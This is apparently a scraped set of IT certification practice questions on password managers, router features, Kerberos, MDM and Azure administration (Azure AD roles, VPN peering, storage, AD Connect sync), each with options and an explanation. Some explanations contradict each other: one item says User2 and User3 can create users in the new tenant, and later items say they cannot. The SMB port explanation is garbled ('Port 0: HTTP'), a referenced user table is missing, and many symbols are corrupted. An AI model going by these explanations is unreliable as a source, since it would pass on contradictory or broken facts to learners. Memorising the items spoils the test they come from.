The number of passwords a user needs to remember is overwhelming, so he has started writing them down. However, the passwords aren’t particularly complicated, and the user has used the same ones across numerous websites. What should you advise him to do?
Install a password manager.
Clear their browsing data.
Clear their browser cache.
Update their certificates.
A password manager is a tool that securely stores and manages a user’s passwords, allowing them to create and store complex passwords without having to remember each one. Here’s why it’s the best solution: Security: Password managers can generate complex, unique passwords for every account, reducing the risk of using the same password across multiple sites, which makes it easier for attackers to access multiple accounts if one password is compromised. Convenience: Instead of writing passwords down (which could be lost, stolen, or accessed by unauthorized people), a password manager securely stores them in an encrypted vault, and the user only needs to remember one master password to access all their other credentials. Efficiency: Password managers can autofill login credentials on websites, streamlining the process and reducing the temptation to use simple or repeated passwords. Why the other options are incorrect: Clear their browsing data: While clearing browsing data can remove stored cookies and other site-related information, it does not address the root issue of remembering and managing passwords. It won’t make passwords more secure. Clear their browser cache: Similar to clearing browsing data, clearing the cache only removes temporary files. It doesn’t affect the security or management of passwords and doesn’t solve the problem of having too many passwords to remember. Update their certificates: Updating certificates is related to ensuring secure connections and is not directly connected to password management or improving security in terms of remembering and storing passwords. Conclusion: The most secure and efficient way to manage numerous passwords is to install a password manager. This will allow the user to create unique, strong passwords for each account and securely store them in one place.
You are setting up a wired network and a SOHO router for a small office. The management is worried that staff members will surf websites that contain objectionable material. Which router feature should you look for to block such access?
Content filtering.
Port forwarding/mapping.
VPN access.
Disabling ports.
Content filtering is a feature that allows the router to block access to websites based on their content. It can be configured to prevent access to objectionable or inappropriate websites by filtering the traffic that passes through the router based on specific criteria such as categories of websites (e.g., adult content, gambling, etc.) or URLs. This is the most effective solution for controlling what users can access on the internet. Many SOHO routers come with built-in content filtering features, or you can set up third-party DNS services like OpenDNS to filter content. Why the other options are incorrect: Port forwarding/mapping: This feature is used to direct traffic from certain ports to specific devices within your local network. It is not used for filtering or blocking web content. VPN access: A VPN (Virtual Private Network) allows users to connect securely to a remote network, but it does not help with filtering out objectionable content. In fact, a VPN could allow users to bypass restrictions if not properly managed. Disabling ports: Disabling specific ports might prevent certain services or protocols (e.g., FTP or remote desktop) from functioning but will not block access to websites or filter out specific content on the internet. Therefore, content filtering is the ideal choice for blocking access to objectionable websites and controlling the types of sites staff members can access.
What employs a third party to verify user credentials and is an open source authentication encryption protocol?
RADIUS
Kerberos
AES
TACACS+
Kerberos is a network authentication protocol that employs a third-party (called the Key Distribution Center (KDC)) to verify user credentials in a secure way. It is based on a ticketing system to ensure secure authentication between users and services over a network. Here’s how it works: User Authentication: The user requests authentication from the KDC, which checks the credentials. Ticket Granting: Once the user is authenticated, the KDC provides a ticket that can be used to access various services within the network. Encryption: The Kerberos protocol uses symmetric encryption to securely communicate between the user, the KDC, and the services, ensuring that user credentials and data are protected. Why Kerberos is correct: Third-Party Verification: The KDC acts as a third party, verifying user credentials and issuing authentication tickets. Open Source: While Kerberos was originally developed by MIT and can be implemented as an open-source protocol (e.g., MIT Kerberos), it’s widely used across many systems. Why the other options are incorrect: RADIUS: While RADIUS does provide a form of third-party authentication, it is not encryption-based in the same way Kerberos is. AES: AES is an encryption standard, not an authentication protocol. TACACS+: A proprietary protocol similar to RADIUS, but it is not open-source and does not operate based on encryption in the same way Kerberos does. Therefore, Kerberos is the correct choice because it uses a third-party (KDC) to verify credentials and provides encryption-based authentication.
Employees are permitted to use their own devices while working for your company. You, as the IT director, are worried about the security of any company data stored on those devices. Which technology should you use?
UAC
EFS
SSO
MDM
Mobile Device Management (MDM) is a technology that allows you to manage and secure employees’ personal devices (also known as BYOD — Bring Your Own Device). It enables you to: Enforce security policies (e.g., requiring strong passwords, encryption, remote wipe). Monitor and control the apps and data on those devices. Secure company data by separating it from personal data and remotely wiping data if a device is lost or stolen. Why the other options are incorrect: UAC (User Account Control): A security feature in Windows that prevents unauthorized changes to the operating system. It is more about local system security than managing mobile devices. EFS (Encrypting File System): A feature that provides file-level encryption on Windows devices. While useful for protecting data, it doesn’t address device management or overall security of personal devices. SSO (Single Sign-On): A system that allows users to log in once to access multiple services, improving usability, but it doesn’t specifically address securing personal devices. Therefore, MDM is the most appropriate technology to secure company data on employees’ personal devices.
What is NOT a biometric identification device?
Fingerprint reader
Palm print scanner
Retina scanner
Hard token
A hard token is a physical object (like a USB token, smart card, or key fob) used for authentication. It provides a possession factor (“something you have”) in multifactor authentication but does not use any biological characteristics for identification. The other options—Fingerprint reader, Palmprint scanner, and Retina scanner—are all biometric identification devices. They authenticate identity based on unique physical traits: Fingerprint reader: scans and matches fingerprint patterns. Palmprint scanner: scans the lines and features of the palm. Retina scanner: scans the blood vessel patterns in the retina. Therefore, Hard token is the correct answer because it does not perform biometric identification.
You sign up for Azure Active Directory (Azure AD) Premium. You need to add a user. named admin1@contoso.com as an administrator on all the computers that will be joined to the Azure AD domain. What should you configure in Azure AD?
Device settings from the Devices blade
Providers from the MFA Server blade
User settings from the Users blade
General settings from the Groups blade
When a computer is Azure AD joined, local administrator rights are not automatically assigned to all users. However, Azure AD allows you to configure who will be a local administrator on all devices joined to the domain. This setting is found in the Device settings section under the Devices blade in Azure Active Directory. Steps to Make admin1@contoso.com an Administrator on All Azure AD-Joined Devices: Go to the Azure AD Portal Navigate to Azure Active Directory in the Azure Portal. Go to the Devices Blade In the Azure AD menu, select Devices ? Device settings. Configure Additional Local Administrators Find the option: “Additional local administrators on Azure AD joined devices” Add the user admin1@contoso.com to this setting. Save the changes. Why Not the Other Options? b) Providers from the MFA Server blade ? The MFA Server blade is for multi-factor authentication settings and has nothing to do with device administration. c) User settings from the Users blade ? The Users blade is for managing individual users but does not control device-level permissions like local admin rights. d) General settings from the Groups blade ? The Groups blade is used for managing group memberships and roles, not device administration settings.
You have a deployment template named Template1 that is used to deploy 10 Azure web apps. You need to identify what to deploy before you deploy Template1. The solution must minimize Azure costs. What should you identify?
five Azure Application Gateways
one App Service plan
10 App Service plans
one Azure Traffic Manager
one Azure Application Gateway
In Azure, App Service Plans define the compute resources (CPU, memory, and storage) that host one or more web apps. Since you need to deploy 10 Azure web apps, the most cost-effective solution is to deploy them under a single App Service Plan, rather than creating 10 separate plans (which would increase costs). How App Service Plans Work: An App Service Plan determines pricing and scaling for web apps. Multiple web apps can share a single App Service Plan, meaning they share resources instead of being billed separately. If all 10 web apps are deployed under the same App Service Plan, you only pay for one set of resources instead of 10. Why Not the Other Options? a) Five Azure Application Gateways ? Application Gateway is a layer 7 load balancer for managing traffic, not required for deploying web apps. You don’t need five of them before deployment. c) 10 App Service plans ? This would create 10 separate compute environments, leading to unnecessary cost increases. A single App Service Plan can handle multiple web apps, reducing cost. d) One Azure Traffic Manager ? Traffic Manager is a DNS-based load balancer for global traffic distribution, which is useful for multi-region deployments but not required before deploying web apps. e) One Azure Application Gateway ? Application Gateway is for managing incoming traffic with WAF (Web Application Firewall) and SSL termination, but it’s not a prerequisite for deploying web apps.
Your company’s Azure subscription includes two Azure networks named VirtualNetworkA and VirtualNetworkB. VirtualNetworkA includes a VPN gateway that is configured to make use of static routing. Also, a site-to-site VPN connection exists between your company’s on-premises network and VirtualNetworkA. You have configured a point-to-site VPN connection to VirtualNetworkA from a workstation running Windows 10. After configuring virtual network peering between VirtualNetworkA and VirtualNetworkB, you confirm that you can access VirtualNetworkB from the company’s on-premises network. However, you find that you cannot establish a connection to VirtualNetworkB from the Windows 10 workstation. You have to make sure that a connection to VirtualNetworkB can be established from the Windows 10 workstation. Solution: You choose the Allow gateway transit setting on VirtualNetworkA. Does the solution meet the goal?
Yes
No
The issue is that while Virtual Network Peering allows communication between VirtualNetworkA and VirtualNetworkB, it does not automatically enable Point-to-Site (P2S) VPN clients to access the peered network (VirtualNetworkB). Why “Allow gateway transit” Does Not Solve the Problem? “Allow gateway transit” is used for VNet-to-VNet connections when one VNet has a VPN Gateway, and the other VNet (without a gateway) needs to use it for outbound traffic. This setting allows VirtualNetworkB to use the VPN Gateway in VirtualNetworkA for on-premises traffic. However, it does not apply to P2S VPN clients trying to connect to VirtualNetworkB. Why Can’t the Windows 10 Workstation Access VirtualNetworkB? When a P2S VPN client connects to VirtualNetworkA, by default, it can only access resources in VirtualNetworkA. Virtual Network Peering does not automatically enable P2S clients to access the peered network (VirtualNetworkB). The issue is that P2S routes do not propagate through VNet peering by default. Correct Solution to Meet the Goal: To allow Point-to-Site VPN clients to access VirtualNetworkB, you must: Enable “Use Remote Gateway” on VirtualNetworkB This allows VirtualNetworkB to send traffic through VirtualNetworkA’s VPN gateway. Configure Route Tables for P2S VPN Clients Add a custom route for the P2S VPN configuration so that it includes VirtualNetworkB’s address space. Modify P2S VPN Configuration Ensure that the VPN configuration includes VirtualNetworkB’s address space in the routing table.
Your company’s Azure subscription includes two Azure networks named VirtualNetworkA and VirtualNetworkB. VirtualNetworkA includes a VPN gateway that is configured to make use of static routing. Also, a site-to-site VPN connection exists between your company’s on-premises network and VirtualNetworkA. You have configured a point-to-site VPN connection to VirtualNetworkA from a workstation running Windows 10. After configuring virtual network peering between VirtualNetworkA and VirtualNetworkB, you confirm that you can access VirtualNetworkB from the company’s on-premises network. However, you find that you cannot establish a connection to VirtualNetworkB from the Windows 10 workstation. You have to make sure that a connection to VirtualNetworkB can be established from the Windows 10 workstation. Solution: You choose the Allow gateway transit setting on VirtualNetworkB. Does the solution meet the goal?
Yes
No
The issue is that Point-to-Site (P2S) VPN clients connected to VirtualNetworkA cannot automatically access VirtualNetworkB through virtual network peering. Simply enabling “Allow gateway transit” on VirtualNetworkB does not solve this issue because P2S VPN routes are not automatically propagated through VNet peering. Why “Allow gateway transit” on VirtualNetworkB Does Not Work? “Allow gateway transit” allows a VNet without a VPN gateway (VirtualNetworkB) to use a gateway in a peered VNet (VirtualNetworkA). This setting is only applicable to VNet-to-VNet connections, not Point-to-Site (P2S) VPN connections. The issue is that P2S VPN clients connected to VirtualNetworkA do not automatically inherit peering routes to VirtualNetworkB. Why Can’t the Windows 10 Workstation Access VirtualNetworkB? When a P2S VPN client connects to VirtualNetworkA, it can only access resources in VirtualNetworkA by default. Virtual network peering does not automatically allow P2S VPN traffic to flow to a peered network (VirtualNetworkB). P2S VPN routes are not automatically advertised to peered VNets unless explicitly configured. Correct Solution to Meet the Goal: To allow Point-to-Site VPN clients to access VirtualNetworkB, you must: Enable “Use Remote Gateway” on VirtualNetworkB This allows VirtualNetworkB to use VirtualNetworkA’s VPN gateway for traffic routing. Modify the P2S VPN Configuration Ensure that the VPN configuration includes VirtualNetworkB’s address space in the routing table. Manually Configure Route Tables (UDR – User Defined Routes) Add a custom route for the P2S VPN configuration so that it includes VirtualNetworkB’s address space. This ensures that P2S VPN clients know how to reach VirtualNetworkB.
Your company’s Azure subscription includes two Azure networks named VirtualNetworkA and VirtualNetworkB. VirtualNetworkA includes a VPN gateway that is configured to make use of static routing. Also, a site-to-site VPN connection exists between your company’s on-premises network and VirtualNetworkA. You have configured a point-to-site VPN connection to VirtualNetworkA from a workstation running Windows 10. After configuring virtual network peering between VirtualNetworkA and VirtualNetworkB, you confirm that you can access VirtualNetworkB from the company’s on-premises network. However, you find that you cannot establish a connection to VirtualNetworkB from the Windows 10 workstation. You have to make sure that a connection to VirtualNetworkB can be established from the Windows 10 workstation. Solution: You downloaded and reinstalled the VPN client configuration package on the Windows 10 workstation. Does the solution meet the goal?
Yes
No
When a Point-to-Site (P2S) VPN client connects to VirtualNetworkA, it follows the routing configuration provided in the VPN client configuration package. If VirtualNetworkB was not included in the original configuration, the VPN client will not know how to reach it. By re-downloading and reinstalling the VPN client configuration package, the client receives the updated routing information that includes VirtualNetworkB, allowing the workstation to establish a connection. Why Does This Work? VPN Configuration Packages Contain Route Information When a VPN client connects, it only knows how to route traffic based on the configuration package it was given at the time of download. If VirtualNetworkB was not originally included, the VPN client would not know how to send traffic there. Re-downloading the VPN Client Configuration Updates Routes When you enable virtual network peering and configure VirtualNetworkA to forward traffic, Azure updates the routing table. By reinstalling the updated VPN client, the Windows 10 workstation receives the new routes, allowing it to access VirtualNetworkB. Why Not Other Solutions? Simply enabling virtual network peering is not enough because P2S VPN clients do not automatically inherit peering routes. Manually configuring routes could work, but reinstalling the VPN client package is the simplest and most effective way to ensure the correct routes are applied.
Your company wants to have some post-deployment configuration and automation tasks on Azure Virtual Machines. Solution: As an administrator, you suggested using ARM templates. Does the solution meet the goal?
Yes
No
Azure Resource Manager (ARM) templates are primarily used for infrastructure as code (IaC) to deploy and configure Azure resources. However, ARM templates are not well-suited for post-deployment configuration and automation tasks inside Virtual Machines (VMs). Why ARM Templates Are Not the Right Solution? ARM templates are declarative—they define what resources should be created, but they are not designed for post-deployment automation inside a VM. While ARM templates allow you to configure VM properties (e.g., networking, OS type, extensions), they lack advanced automation capabilities for tasks like installing software, configuring applications, or running scripts inside the VM after deployment. Correct Solution for Post-Deployment Configuration & Automation: To handle post-deployment automation inside Azure VMs, you should use one of the following: ? Azure Virtual Machine Extensions Use Custom Script Extension to run scripts inside the VM post-deployment. Install and configure software using PowerShell DSC (Desired State Configuration) or Chef/Puppet. ? Azure Automation & Runbooks Automate tasks using Azure Automation and Runbooks, which can execute scripts inside Azure VMs. ? Azure AutoManage If managing Windows/Linux VMs, AutoManage simplifies post-deployment configuration by applying best practices automatically. ? Azure DevOps Pipelines / GitHub Actions Use DevOps pipelines to trigger post-deployment scripts or Ansible playbooks.
Your company wants to have some post-deployment configuration and automation tasks on Azure Virtual Machines. Solution: As an administrator, you suggested using Virtual machine extensions. Does the solution meet the goal?
Yes
No
Azure Virtual Machine Extensions are the correct choice for post-deployment configuration and automation tasks on Azure Virtual Machines (VMs). These extensions allow administrators to execute scripts, install software, configure settings, and automate management tasks after the VM has been deployed. Why Virtual Machine Extensions Are the Right Solution? Designed for Post-Deployment Tasks VM extensions allow you to perform custom configurations, automation, and updates after a VM has been deployed. Supports Various Automation Tools Custom Script Extension: Runs PowerShell or Bash scripts for post-deployment configuration. Azure Desired State Configuration (DSC) Extension: Ensures that VMs remain predefined. Third-Party Tools: Integrates with tools like Chef, Puppet, or Ansible for configuration management. No Need for Manual Intervention Once a VM is deployed, VM extensions can be automatically applied, reducing the need for manual configurations. Examples of What VM Extensions Can Do: Install software (e.g., IIS, SQL Server, Apache, or custom applications). Configure firewall rules or security settings. Apply patches or updates after deployment. Deploy monitoring agents (Azure Monitor, Log Analytics, Microsoft Defender for Cloud). Why Other Solutions Like ARM Templates Are Not Enough? ARM templates can define VM properties but do not automate tasks inside the VM after deployment. Azure Automation is useful for broader automation but does not run inside the VM like extensions do.
You have an Azure subscription that contains the following users in an Azure Active Directory tenant named contoso.onmicrosoft.com User1 creates a new Azure Active Directory tenant named external.contoso.onmicrosoft.com. You need to create new user accounts in external.contoso.onmicrosoft.com. Solution: You instruct User4 to create the user accounts. Does that meet the goal?
Yes
No
User4 has the Owner role at the Azure Subscription level, but not in Azure Active Directory (Azure AD). Managing users in Azure AD requires specific directory roles, such as Global Administrator or User Administrator. Why User4 Cannot Create User Accounts? Azure Subscription roles (e.g., Owner, Contributor) apply to resources within the subscription (such as VMs, storage, and networking). Azure AD roles (e.g., Global Administrator, User Administrator) apply to identity and user management. Since User4 is an Owner at the subscription level, they do not have any privileges to manage Azure AD users in external.contoso.onmicrosoft.com. Who Can Create Users in external.contoso.onmicrosoft.com? ? User1 (Global Administrator) ? Can create and manage users in external.contoso.onmicrosoft.com. ? User2 (Global Administrator) ? Can create and manage users. ? User3 (User Administrator) ? Can create and manage users.
You have an Azure subscription that contains the following users in an Azure Active Directory tenant named contoso.onmicrosoft.com User1 creates a new Azure Active Directory tenant named external.contoso.onmicrosoft.com. You need to create new user accounts in external.contoso.onmicrosoft.com. Solution: You instruct User3 to create the user accounts. Does that meet the goal?
Yes
No
User3 has the User Administrator role in the contoso.onmicrosoft.com Azure AD tenant. However, this role does not automatically grant permissions in the new tenant (external.contoso.onmicrosoft.com) that User1 created. Why User3 Cannot Create User Accounts? Azure AD roles are tenant-specific. User3’s User Administrator role applies only to contoso.onmicrosoft.com, not to external.contoso.onmicrosoft.com. Since the new tenant (external.contoso.onmicrosoft.com) is a separate directory, User3 does not have any assigned roles there by default. Only users with appropriate roles in the new tenant can create users. When User1 created external.contoso.onmicrosoft.com, they became a Global Administrator of that new tenant. Other users from contoso.onmicrosoft.com do not automatically get any roles in the new tenant. Who Can Create Users in external.contoso.onmicrosoft.com? ? User1 (Global Administrator in external.contoso.onmicrosoft.com) ? Can create users. ? User2 (If assigned Global Administrator in the new tenant) ? Can create users.
You have an Azure subscription that contains the following users in an Azure Active Directory tenant named contoso.onmicrosoft.com User1 creates a new Azure Active Directory tenant named external.contoso.onmicrosoft.com. You need to create new user accounts in external.contoso.onmicrosoft.com. Solution: You instruct User2 to create the user accounts. Does that meet the goal?
Yes
No
User2 has the Global Administrator role in the contoso.onmicrosoft.com Azure AD tenant. However, this role does not automatically apply to the new tenant (external.contoso.onmicrosoft.com) that User1 created. Why User2 Cannot Create User Accounts? Azure AD roles are tenant-specific. Being a Global Administrator in contoso.onmicrosoft.com does not grant any permissions in external.contoso.onmicrosoft.com. Since external.contoso.onmicrosoft.com is a separate Azure AD tenant, User2 does not have any administrative privileges there by default. Who Gets Admin Rights in the New Tenant? The user who creates a new tenant (User1) automatically becomes a Global Administrator in that new tenant. Other users from the original tenant (contoso.onmicrosoft.com) do not get any roles in the new tenant unless explicitly assigned. Who Can Create Users in external.contoso.onmicrosoft.com? ? User1 (Global Administrator in external.contoso.onmicrosoft.com) ? Can create users. Correct Solution: To allow User2 to create user accounts, User1 must first add User2 as a Global Administrator in external.contoso.onmicrosoft.com.
You have an Azure subscription that contains the following users in an Azure Active Directory tenant named contoso.onmicrosoft.com User1 creates a new Azure Active Directory tenant named external.contoso.onmicrosoft.com. You need to create new user accounts in external.contoso.onmicrosoft.com. Solution: You instruct User1 to create the user accounts. Does that meet the goal?
Yes
No
When User1 creates the new Azure Active Directory (Azure AD) tenant external.contoso.onmicrosoft.com, they automatically become a Global Administrator for that new tenant. Why Can User1 Create User Accounts? The Creator of a New Azure AD Tenant Becomes a Global Administrator In Azure AD, the user who creates a new tenant is automatically assigned the Global Administrator role in that tenant. Since User1 created external.contoso.onmicrosoft.com, they have full administrative control, including user management. Global Administrator Can Create and Manage Users The Global Administrator role has full control over Azure AD, including the ability to: Create, modify, and delete users. Assign roles to users. Manage groups and directory settings. Who Else Can Create Users in external.contoso.onmicrosoft.com? ? User1 (Global Administrator in the new tenant) ? Can create users. ? Any other user assigned Global Administrator or User Administrator in external.contoso.onmicrosoft.com. Why Other Users From contoso.onmicrosoft.com Cannot Create Users? User2 (Global Administrator in contoso.onmicrosoft.com) ? No permissions in the new tenant unless assigned. User3 (User Administrator in contoso.onmicrosoft.com) ? No permissions in the new tenant unless assigned. User4 (Owner of Azure Subscription) ? Azure Subscription roles do not grant permissions in Azure AD.
You create an Azure Storage account. You plan to add 10 blob containers to the storage account. You need to use a different key for one of the containers to encrypt data at rest. What should you do before you create the container?
Generate a shared access signature (SAS)
Modify the minimum TLS version
Rotate the access keys
Create an encryption scope
Azure Storage automatically encrypts data at rest using Microsoft-managed keys by default. However, if you need to encrypt data in a specific blob container using a different key (such as a customer-managed key stored in Azure Key Vault), you must first create an encryption scope. An encryption scope allows you to define a unique encryption configuration within a storage account. Each blob container in the storage account can be assigned a different encryption scope, enabling you to use different keys for different containers. Steps: Create an encryption scope in the Azure Storage account. You can choose to use a Microsoft-managed key or a customer-managed key (CMK). Specify the encryption scope when creating the blob container. Any blobs added to that container will be encrypted using the specified encryption scope and key. Why not the other options? (a) Generate a shared access signature (SAS) A SAS token provides secure, limited-time access to resources but does not control encryption at rest. It is used for authentication and authorization, not encryption. (b) Modify the minimum TLS version Changing the TLS version affects transport security, not data encryption at rest. TLS is used to secure data in transit. (c) Rotate the access keys Rotating access keys helps improve security by refreshing authentication credentials but does not allow you to use a different encryption key for a specific container.
You have an Azure Active Directory (Azure AD) tenant named contosocloud.onmicrosoft.com. Your company has a public DNS zone for contoso.com. You add contoso.com as a custom domain name to Azure AD. You need to ensure that Azure can verify the domain name. Which type of DNS record should you create?
MX
NSEC
PTR
RRSIG
When you add a custom domain (e.g., contoso.com) to Azure Active Directory (Azure AD), you must verify domain ownership. Azure AD provides a verification code that you must add as a DNS record in your domain’s public DNS zone. To verify the domain, Azure AD supports adding either an MX record or a TXT record. While TXT records are commonly used, MX records are also a valid option. Why use an MX record? An MX (Mail Exchange) record is used for routing emails, but Azure AD allows it for domain verification purposes. Azure AD provides an MX record value (e.g., xxxxxxxxx.msv1.invalid) that you must add to your DNS provider. Once the MX record is propagated, Azure AD can verify the domain. No email functionality is affected because the provided MX record is not a functional mail server—it is only for verification. Why not the other options? (b) NSEC (Next Secure Record) Used in DNSSEC (Domain Name System Security Extensions) to prevent DNS spoofing, but not related to domain verification. (c) PTR (Pointer Record) Used for reverse DNS lookups (mapping an IP address to a domain), but not for verifying domain ownership. (d) RRSIG (Resource Record Signature) A DNSSEC record used to ensure integrity and authenticity of DNS data but does not help in domain verification.
You run a small company that sells its products online with a web server and a SOHO router. You have paid the ISP for a specific IP address that is yours and won’t change since you don’t want the IP address of your web server to change. On your router, what would you configure for your ISP connection?
Screened subnet
Dynamic WAN IP
UPnP
Static WAN IP
A Static WAN IP is an IP address assigned to your router’s Wide Area Network (WAN) interface that does not change over time. Since your company has paid your ISP for a fixed IP address, you need to configure the router’s WAN settings with that static IP, along with the corresponding subnet mask, gateway, and DNS settings provided by the ISP. This is essential for: Hosting a web server, as clients need a consistent IP to reach it. Ensuring reliable DNS mapping to your domain name. Why the other options are incorrect: Dynamic WAN IP: Assigned automatically by the ISP and may change, which is not suitable for hosting a server. UPnP (Universal Plug and Play): Used to automatically open ports for devices inside the network, not for setting IP addresses. Screened subnet (DMZ): A secure network zone for public-facing servers, but it doesn’t relate to how your router gets its WAN IP.
You create an Azure Storage account named storage1. You plan to create a file share named datal. Users need to map 1 drive to the data file share from home computers that run Windows 10. Which outbound port should you open between the home computers and the data file share?
80
443
445
3389
* Port 0: HTTP, this is for web + Port 443: HTTPS, for web too + Port 445, as this is the port for SMB protocol to share files + Port 3389: Remote desktop protocol (RDP)
Your company has an Azure Active Directory (Azure AD) tenant named weyland.com that is configured for hybrid coexistence with the on-premises Active Directory domain. You have a server named DirSync1 that is configured as a DirSync server. You create a new user account in the on-premises Active Directory. You now need to replicate the user information to Azure AD immediately. Solution: You use Active Directory Sites and Services to force replication of the Global Catalog on a domain controller. Does the solution meet the goal?
Yes
No
The problem requires forcing an immediate synchronization of a newly created on-premises Active Directory (AD) user to Azure AD. However, the proposed solution—using Active Directory Sites and Services to force replication of the Global Catalog on a domain controller—only replicates data within on-premises domain controllers. It does not trigger synchronization to Azure AD. Why is the proposed solution incorrect? Active Directory Sites and Services is used to manage replication between domain controllers (DCs) in an on-premises AD environment. Forcing replication of the Global Catalog (GC) only ensures that changes are propagated among domain controllers within the on-premises infrastructure. However, Azure AD Connect (DirSync) is responsible for syncing changes from on-premises AD to Azure AD. Simply forcing replication between DCs does not push the changes to Azure AD.
Your company has an Azure Active Directory (Azure AD) tenant named weyland.com that is configured for hybrid coexistence with the on-premises Active Directory domain. You have a server named DirSync1 that is configured as a DirSync server. You create a new user account in the on-premises Active Directory. You now need to replicate the user information to Azure AD immediately. Solution: You run the Start-ADSyncSyncCycle -Policy Type Initial PowerShell cmdlet. Does the solution meet the goal?
Yes
No
The goal is to replicate the newly created user account from on-premises Active Directory (AD) to Azure AD immediately. The proposed solution suggests running the following PowerShell command: Start-ADSyncSyncCycle -PolicyType Initial While this does trigger synchronization, it is not the most efficient option because: “Initial” sync performs a full synchronization, which includes all objects in AD, not just the recent changes. A full sync is slower and more resource-intensive than necessary. Since we only need to sync the newly created user, a delta sync is more appropriate. Instead of an initial sync, the best approach is to run a delta sync, which synchronizes only the recent changes (e.g., newly added users): Start-ADSyncSyncCycle -PolicyType Delta ? Delta sync is faster and syncs only the recent changes, ensuring that the new user appears in Azure AD without affecting other objects. ? Initial sync should only be used if there is a major configuration change or if Azure AD Connect is being set up for the first time.
Your company has an Azure Active Directory (Azure AD) tenant named weyland.com that is configured for hybrid coexistence with the on-premises Active Directory domain. You have a server named DirSync1 that is configured as a DirSync server. You: create a new user account in the on-premise Active Directory. You now need to replicate the user information to Azure AD immediately. Solution: You run the Start-ADSyncSyncCycle -Bolicy Type Delta PowerShell cmdlet. Does the solution meet the goal?
Yes
No
The goal is to immediately synchronize a newly created user account from on-premises Active Directory (AD) to Azure AD. The proposed solution runs the following PowerShell command: Start-ADSyncSyncCycle -PolicyType Delta This successfully meets the requirement because: “Delta” synchronization only syncs the changes (new users, modified attributes, deletions, etc.) instead of performing a full synchronization. It is fast and efficient, ensuring that the newly created user is replicated to Azure AD immediately. It avoids unnecessary processing compared to an “Initial” sync, which would resync all objects. Why This Works? Azure AD Connect (DirSync) is responsible for synchronizing on-premises AD objects to Azure AD. By default, synchronization happens every 30 minutes. The Start-ADSyncSyncCycle -PolicyType Delta command forces an immediate sync of only recent changes instead of waiting for the next scheduled sync.
You have an Azure subscription. In the Azure portal, you plan to create a storage account named storage that will have the following settings: «Performance: Standard «Replication: Zone-redundant storage (ZRS) «Access tier (default): Cool «Hierarchical namespace: Disabled You need to ensure that you can set Account kind for storage1 to Block BlobStorage. Which setting should you modify first?
Performance
Replication
Access tier (default)
Hierarchical namespace
The Account Kind of an Azure Storage account determines the type of data it can store and how it operates. If you want to set the Account Kind to BlockBlobStorage, you must first ensure that the Performance setting is set to Premium. Why? BlockBlobStorage accounts are designed specifically for high-performance workloads using block blobs. BlockBlobStorage accounts require the Performance setting to be set to “Premium.” The default Standard performance setting is only available for General-purpose v2 (GPv2) accounts and not for BlockBlobStorage accounts. Why Not the Other Options? ? (b) Replication (ZRS) Replication type (LRS, ZRS, GRS, etc.) affects data redundancy but does not impact the ability to select BlockBlobStorage as the account kind. ? (c) Access tier (Cool) Access tiers (Hot, Cool, Archive) determine how frequently data is accessed but do not affect the account kind. BlockBlobStorage accounts only support the Hot and Cool tiers, but changing this setting alone would not allow you to select BlockBlobStorage. ? (d) Hierarchical namespace Hierarchical namespace is required for Azure Data Lake Storage (ADLS) but is unrelated to BlockBlobStorage. BlockBlobStorage accounts do not support hierarchical namespaces.
You administer a solution in Azure that is currently having performance issues. You need to find the cause of the performance issues about metrics on the Azure infrastructure. Which of the following is the tool you should use?
Azure Traffic Analytics
Azure Monitor
Azure Activity Log
Azure Advisor
When diagnosing performance issues in an Azure solution, you need a tool that provides real-time and historical performance metrics for Azure infrastructure (such as CPU, memory, disk I/O, and network usage). ? Azure Monitor is the best choice because: It collects, analyzes, and visualizes performance metrics from Azure resources (VMs, databases, networking, applications, etc.). It provides real-time monitoring and alerting to detect performance bottlenecks. It integrates with Log Analytics and Application Insights to correlate system and application-level issues. It includes Azure Metrics Explorer to analyze CPU, memory, and network performance trends over time. Why Not the Other Options? ? (a) Azure Traffic Analytics Focuses on network traffic analysis from Azure Network Watcher. Helps detect DDoS attacks and network anomalies, but does not analyze infrastructure metrics like CPU or memory usage. ? (c) Azure Activity Log Tracks administrative and security-related events (e.g., resource creation, deletion, and role assignments). Does not provide real-time performance metrics. ? (d) Azure Advisor Provides best practice recommendations to improve security, performance, and cost-efficiency. Does not offer detailed infrastructure monitoring or real-time performance insights.
You have an Azure subscription named Subscription1. Subscription contains a resource group named RG1. RG1 contains resources that were deployed by using templates. You need to view the date and time when the resources were created in RG1. Solution: From the Subscriptions blade, you select the subscription, and then click Programmatic deployment. Does the solution meet the goal?
Yes
No
The goal is to view the date and time when resources were created in Resource Group RG1. The proposed solution suggests navigating to Programmatic Deployment from the Subscriptions blade, but this will not provide the required creation timestamps. Why is this solution incorrect? The Programmatic deployment section in Azure only provides deployment options (such as ARM templates, Bicep, or Terraform). It does not show historical deployment details or resource creation timestamps. The correct place to find resource creation timestamps is in the Activity Log or Deployments section of RG1. Correct Approach to View Resource Creation Date & Time: 1?? Using Activity Log (Best Method) Go to Azure Portal ? Navigate to RG1 (Resource Group). Select Activity Log ? Filter by “Deployment” events to see when resources were created. This log contains timestamps and details of deployments, including which resources were deployed and by whom. 2?? Using the Deployments Section in RG1 Go to Azure Portal ? RG1 ? Deployments. This section shows the history of ARM template deployments, including timestamps. 3?? Using Azure Resource Graph Explorer (for advanced queries) You can run queries to check when each resource was created using Azure Resource Graph. Why Not the Other Options? ? Programmatic Deployment does not contain resource creation timestamps. ? Activity Log or Deployments section in RG1 is the correct way to get this information.
You have an Azure subscription named Subscription1. Subscription contains a resource group named RG1. RG1 contains resources that were deployed by using templates. You need to view the date and time when the resources were created in RG1. Solution: From the Subscriptions blade, you select the subscription, and then click Resource providers. Does the solution meet the goal?
Yes
No
The goal is to view the date and time when resources were created in Resource Group RG1. The proposed solution suggests going to the Subscriptions blade ? Selecting the subscription ? Clicking Resource Providers. However, this does not provide resource creation timestamps. Why is this solution incorrect? Resource Providers in Azure manage different resource types (e.g., Microsoft.Compute for VMs, Microsoft.Storage for storage accounts). This section only registers and manages resource providers, but does not show deployment history or timestamps. It does not track when resources were created. Correct Approach to View Resource Creation Date & Time: ? Method 1: Use the Activity Log (Best Method) Go to the Azure Portal ? Navigate to RG1. Click on Activity Log. Apply a filter for “Deployment” events. This will show a timestamp of when each resource was created. ? Method 2: Check the Deployments Section in RG1 Go to RG1 ? Click on Deployments. This will show ARM template deployments, including timestamps of when resources were provisioned. ? Method 3: Use Azure Resource Graph (Advanced Queries) You can query Azure Resource Graph Explorer to find resource creation timestamps programmatically. Why Not Resource Providers? ? Resource Providers do not store or display resource creation timestamps. ? The correct way to check timestamps is through the Activity Log or Deployments section in RG1.
